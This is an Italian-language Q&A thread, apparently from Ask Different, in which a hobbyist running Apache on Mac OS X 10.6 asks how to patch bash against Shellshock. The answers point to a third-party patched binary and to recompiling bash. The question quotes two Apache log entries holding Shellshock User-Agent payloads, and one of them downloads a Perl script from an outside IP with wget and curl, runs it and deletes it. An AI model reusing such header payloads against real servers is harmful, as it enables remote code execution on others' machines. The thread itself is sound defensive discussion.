Patch Apple Shellshock per 10.6?

3

Sto eseguendo un piccolo server HTTP (Apache) dal mio Mac principalmente come hobby. Se viene compromesso, non è la fine del mondo, ma è qualcosa che mi piacerebbe sicuramente prevenire. Ho impostato un processo launchctl per controllare il file di registro di Apache per eventuali richieste relative a Shellshock e ieri sera ho ricevuto due voci correlate: 

82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Il primo sembra innocuo e l'IP ospita un sito Web molto legittimo che afferma che le loro richieste sono solo a scopo di ricerca. La seconda è una storia diversa, però, prova a scaricare ed eseguire uno script Perl. Fortunatamente non ho installato wget, quindi questo attacco non ha funzionato, ma sembra che sia solo questione di tempo prima di ricevere una richiesta del genere che faccia qualche danno.

Apple ha appena rilasciato patch per OS X 10.7 e quest'ultimo, ma sfortunatamente sono in esecuzione 10.6. Quali misure semplici e affidabili posso prendere (ad es ricompilando bash ) per ridurre i miei rischi?

security  bug  webserver  http 
Reed Espinosa
fonte
Correggimi se sbaglio, ma bash è vulnerabile giusto? Ho sentito che l'installazione di una shell diversa come dash, csh o qualsiasi altra cosa aiuta a mitigarla. Sebbene, questo potrebbe richiedere ancora la compilazione.
jonescb

Risposte:

3

Se non vuoi ricompilare Bash da solo, i ragazzi di TenFourFox (che realizzano una versione PPC di Firefox) hanno compilato un binario che funziona su OS X 10.4 - 10.9 su entrambi i Mac PPC e Intel, e hanno le istruzioni del terminale per l'installazione:

http://tenfourfox.blogspot.com/2014/09/bashing-bash-one-more-time-updated.html

Al momento di scrivere (30 settembre) hanno compilato Bash 4.3.27, ma questo manca ancora un paio di vulnerabilità che anche la patch ufficiale di Apple ha mancato. Quindi è meglio di niente, ma vorrai continuare a guardare per aggiornamenti futuri.

SyneRyder
fonte
Perfezionare! Molto apprezzato; istruzioni chiare e hanno funzionato esattamente come pubblicizzato.
Wildcard
0

Potresti provare a ricompilare bash da solo Questo collegamento. Corrisponde alla vulnerabile versione di bash, ma la nuova versione non è firmata da Apple e potrebbe eventualmente rompere le cose.

C Elegans
fonte
0

Controlla la sezione "File binari di sistema" di questa risposta. Funziona per 10.6.8, assumendo che tu abbia Xcode installato.

https://apple.stackexchange.com/a/146851/96606

Jon Gardner
fonte
Le risposte su Ask Different devono essere più di un semplice link. Va bene includere un link, ma per favore riassumerlo o estrarlo nella risposta. L'idea è di rendere la risposta indipendente.
Daniel
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.